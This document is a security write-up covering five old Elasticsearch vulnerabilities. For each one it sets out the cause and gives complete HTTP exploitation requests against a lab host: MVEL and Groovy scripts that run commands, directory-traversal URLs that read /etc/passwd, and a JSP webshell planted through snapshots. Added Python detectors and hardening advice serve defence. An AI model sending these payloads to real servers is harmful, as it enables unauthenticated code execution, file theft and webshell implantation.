1. ElasticSearch command execution vulnerability (CVE-2014-3120)
1) Vulnerability principle:
Elasticsearch before 1.2 enables dynamic scripting by default, and its default script language, MVEL, runs with the full privileges of the Java process. Any unauthenticated client that can reach port 9200 can therefore place a script in the script_fields section of a search request and have it executed on the server; the Runtime.getRuntime().exec(...) call in the payload is exactly that.
2) Exploitation steps:
POST /_search?pretty HTTP/1.1
Host: 192.168.68.129:9200
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wp-settings-time-1=1692082910
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
"name": "phithon"
}

POST /_search?pretty HTTP/1.1
Host: 192.168.68.129:9200
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wp-settings-time-1=1692082910
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 369

{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}
3) Affected versions: <= v1.1.1
2. ElasticSearch Groovy sandbox bypass && code execution vulnerability (CVE-2015-1427)
1) Vulnerability principle:
From 1.2 onward dynamic MVEL scripting is off by default, but Groovy scripts are still accepted and run inside a sandbox. That sandbox only blacklists particular classes and methods, so reflection (the Class.forName("java.lang.Runtime") call in the payload) reaches java.lang.Runtime anyway and again gives unauthenticated command execution.
2) Exploitation steps:
POST /website/blog/ HTTP/1.1
Host: 192.168.68.129:9200
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.68.129:9200/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wp-settings-time-1=1692082910
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

{
"name": "test"
}

POST /_search?pretty HTTP/1.1
Host: 192.168.68.129:9200
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.68.129:9200/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wp-settings-time-1=1692082910
Connection: close
Content-Type: application/text
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
3) Affected versions: <= v1.4.2
3. ElasticSearch directory traversal vulnerability (CVE-2015-3337)
1) Vulnerability principle:
Site plugins are served from the plugin directory under /_plugin/<name>/, and the remainder of the URL was joined to that directory without normalizing it first, so ".." segments walk out of it and any file readable by the Elasticsearch user can be fetched. A site plugin (here head) must be installed for the route to exist.
2) Exploitation steps:
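Added example (not code from the original post): a Python check that a reverse proxy or log pipeline in front of port 9200 could run over search request bodies to flag the dynamic-script pattern shared by the two payloads above, the MVEL script of CVE-2014-3120 and the Groovy reflection of CVE-2015-1427. The SUSPICIOUS token list and the sample bodies are constructed for this example; the two malicious samples reproduce the page's own payloads, and the default of "mvel" for a script with no lang reflects 1.x behaviour.

```python
import json
import re

# Tokens that a search-time script has no business containing. Constructed for
# this example from the two payloads on the page (MVEL Runtime.exec and Groovy
# reflection via Class.forName); extend the list for your own environment.
SUSPICIOUS = re.compile(
    r"Runtime|ProcessBuilder|\.exec\s*\(|[Cc]lass\.forName|java\.io\.|"
    r"getInputStream|useDelimiter|\bimport\s+java"
)


def _iter_scripts(node, path=""):
    """Yield (json_path, lang, script_text) for every script in a request body."""
    if isinstance(node, dict):
        script = node.get("script")
        if isinstance(script, str):
            # Elasticsearch 1.x runs a script with no "lang" as MVEL
            yield path, node.get("lang", "mvel"), script
        elif isinstance(script, dict):
            # later request shapes put the text under "inline" or "source"
            text = script.get("inline") or script.get("source")
            if isinstance(text, str):
                yield path, script.get("lang", node.get("lang", "mvel")), text
        for key, val in node.items():
            yield from _iter_scripts(val, f"{path}/{key}")
    elif isinstance(node, list):
        for i, val in enumerate(node):
            yield from _iter_scripts(val, f"{path}[{i}]")


def inspect_body(raw_body):
    """Return one finding per script that carries a dangerous token.

    A body that does not parse is reported too: Elasticsearch 1.x is lenient
    about Content-Type, so an unparseable body is not automatically harmless.
    """
    try:
        body = json.loads(raw_body)
    except ValueError:
        return [{"path": "", "lang": "", "reason": "unparseable JSON body"}]
    findings = []
    for path, lang, text in _iter_scripts(body):
        hit = SUSPICIOUS.search(text)
        if hit:
            findings.append({"path": path, "lang": lang,
                             "reason": f"dangerous token {hit.group(0)!r}"})
    return findings


# Constructed sample bodies: one legitimate script_fields query and the two
# payloads shown on the page.
BENIGN = json.dumps({
    "query": {"match_all": {}},
    "script_fields": {"double_price": {"script": "doc['price'].value * 2"}},
})
PAYLOAD_MVEL = json.dumps({
    "size": 1,
    "query": {"filtered": {"query": {"match_all": {}}}},
    "script_fields": {"command": {"script":
        'import java.io.*;new java.util.Scanner(Runtime.getRuntime()'
        '.exec("cat /etc/passwd").getInputStream()).useDelimiter("\\\\A").next();'}},
})
PAYLOAD_GROOVY = json.dumps({
    "size": 1,
    "script_fields": {"lupin": {"lang": "groovy", "script":
        'java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()'}},
})

if __name__ == "__main__":
    for name, body in [("benign", BENIGN), ("mvel", PAYLOAD_MVEL), ("groovy", PAYLOAD_GROOVY)]:
        print(name, inspect_body(body))
```

Detection of this kind is a stop-gap. On the 1.x line the durable fix is to upgrade past the affected versions and to set script.disable_dynamic: true and script.groovy.sandbox.enabled: false in elasticsearch.yml, and in every version to keep port 9200 off untrusted networks, since none of these requests needs credentials.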
http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd
3) Affected versions: <= v1.4.4
4. ElasticSearch directory traversal vulnerability (CVE-2015-5531)
1) Vulnerability principle:
The snapshot API derives the on-disk file name of a snapshot as "snapshot-" followed by the user-supplied snapshot name and reads it from the repository directory without checking for traversal. Registering a second repository whose location is the first repository's directory plus "snapshot-backdata" makes Elasticsearch create that directory, after which a snapshot name beginning with "backdata/../" (with the slashes URL-encoded as %2f) reads an arbitrary file through the first repository.
2) Exploitation steps:
PUT /_snapshot/test HTTP/1.1
Host: 192.168.68.129:9200
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wp-settings-time-1=1692082910
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 108

{
"type": "fs",
"settings": {
"location": "/usr/share/elasticsearch/repo/test"
}
}

PUT /_snapshot/test2 HTTP/1.1
Host: 192.168.68.129:9200
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wp-settings-time-1=1692082910
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

{
"type": "fs",
"settings": {
"location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
}
}

http://192.168.68.129:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
3) Affected versions: below 1.6.1
5. Elasticsearch webshell write vulnerability (WooYun-2015-110216)
1) Vulnerability principle:
Affected versions place no restriction on where a filesystem repository may be created, so an fs repository can point at any directory the Elasticsearch user can write to, such as a Tomcat web root. A document whose field name is JSP code is indexed into an index named a.jsp; snapshotting that index into the repository writes its mapping to indices/a.jsp/snapshot-a.jsp under the web root, where Tomcat serves it as a JSP and the embedded code writes test.jsp from the f parameter.
2) Exploitation steps:
POST /a.jsp/a.jsp/1 HTTP/1.1
Host: 192.168.68.129:9200
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wp-settings-time-1=1692082910
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 228

{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}

PUT /_snapshot/a.jsp HTTP/1.1
Host: 192.168.68.129:9200
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wp-settings-time-1=1692082910
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 107

{
"type": "fs",
"settings": {
"location": "/usr/local/tomcat/webapps/wwwroot/",
"compress": false
}
}

PUT /_snapshot/a.jsp/a.jsp HTTP/1.1
Host: 192.168.68.129:9200
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wp-settings-time-1=1692082910
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 102

{
"indices": "a.jsp",
"ignore_unavailable": "true",
"include_global_state": false
}

http://192.168.68.129:8080/wwwroot/indices/a.jsp/snapshot-a.jsp?f=4444
http://192.168.68.129:8080/wwwroot/test.jsp
3) Affected versions: before 1.5.x
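Added example (not code from the original post) covering items 3 to 5 above: Python checks for the path-based abuses, namely ".." segments after /_plugin/<name>/ (CVE-2015-3337), traversal hidden in a percent-encoded snapshot name (CVE-2015-5531), and fs repository registrations whose location lies outside the allowed path.repo roots or whose name looks like a web script (the webshell write). ALLOWED_REPO_ROOTS is an assumed path.repo value; the sample paths and bodies reproduce the page's own URLs and requests.

```python
import json
import posixpath
from urllib.parse import unquote

# Assumed path.repo value for this example; with path.repo configured,
# Elasticsearch only accepts fs repositories located under these roots.
ALLOWED_REPO_ROOTS = ["/usr/share/elasticsearch/repo"]
SCRIPT_SUFFIXES = (".jsp", ".jspx", ".php", ".aspx")


def decode_fully(text, rounds=3):
    """Percent-decode repeatedly so %252f style double encoding is seen too."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def has_traversal(segment):
    """True if a decoded path component contains a '..' element."""
    decoded = decode_fully(segment).replace("\\", "/")
    return ".." in decoded.split("/")


def check_request_path(path):
    """Classify a request path as a proxy in front of port 9200 sees it."""
    decoded = decode_fully(path.split("?", 1)[0])
    parts = decoded.split("/")
    if len(parts) > 2 and parts[1] == "_plugin" and ".." in parts:
        return "plugin-path-traversal"      # CVE-2015-3337 shape
    if len(parts) > 3 and parts[1] == "_snapshot" and has_traversal("/".join(parts[3:])):
        return "snapshot-name-traversal"    # CVE-2015-5531 shape
    if ".." in parts:
        return "path-traversal"
    return "ok"


def check_repository_registration(repo_name, raw_body, allowed_roots=ALLOWED_REPO_ROOTS):
    """Problems with a PUT /_snapshot/<repo_name> body; empty list if none."""
    problems = []
    if has_traversal(repo_name) or repo_name.lower().endswith(SCRIPT_SUFFIXES):
        problems.append(f"suspicious repository name {repo_name!r}")
    body = json.loads(raw_body)
    if body.get("type") != "fs":
        return problems
    location = body.get("settings", {}).get("location", "")
    norm = posixpath.normpath(location)
    inside = any(norm == root or norm.startswith(root.rstrip("/") + "/")
                 for root in allowed_roots)
    if not inside:
        problems.append(f"fs location {location!r} is outside path.repo")
    return problems


# Sample requests reproducing the URLs and bodies shown on the page.
SAMPLE_PATHS = [
    "/_plugin/head/../../../../../../../../../etc/passwd",
    "/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    "/_search?pretty",
]
SAMPLE_REPOS = [
    ("test", '{"type": "fs", "settings": {"location": "/usr/share/elasticsearch/repo/test"}}'),
    ("a.jsp", '{"type": "fs", "settings": {"location": "/usr/local/tomcat/webapps/wwwroot/", "compress": false}}'),
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(check_request_path(p), p)
    for name, body in SAMPLE_REPOS:
        print(name, check_repository_registration(name, body))
```

Note what the repository check does not catch: the second repository in item 4 (location .../repo/test/snapshot-backdata) sits inside the allowed root and passes, so path.repo alone does not neutralize CVE-2015-5531; the snapshot-name traversal check and an upgrade to a fixed release are what close it.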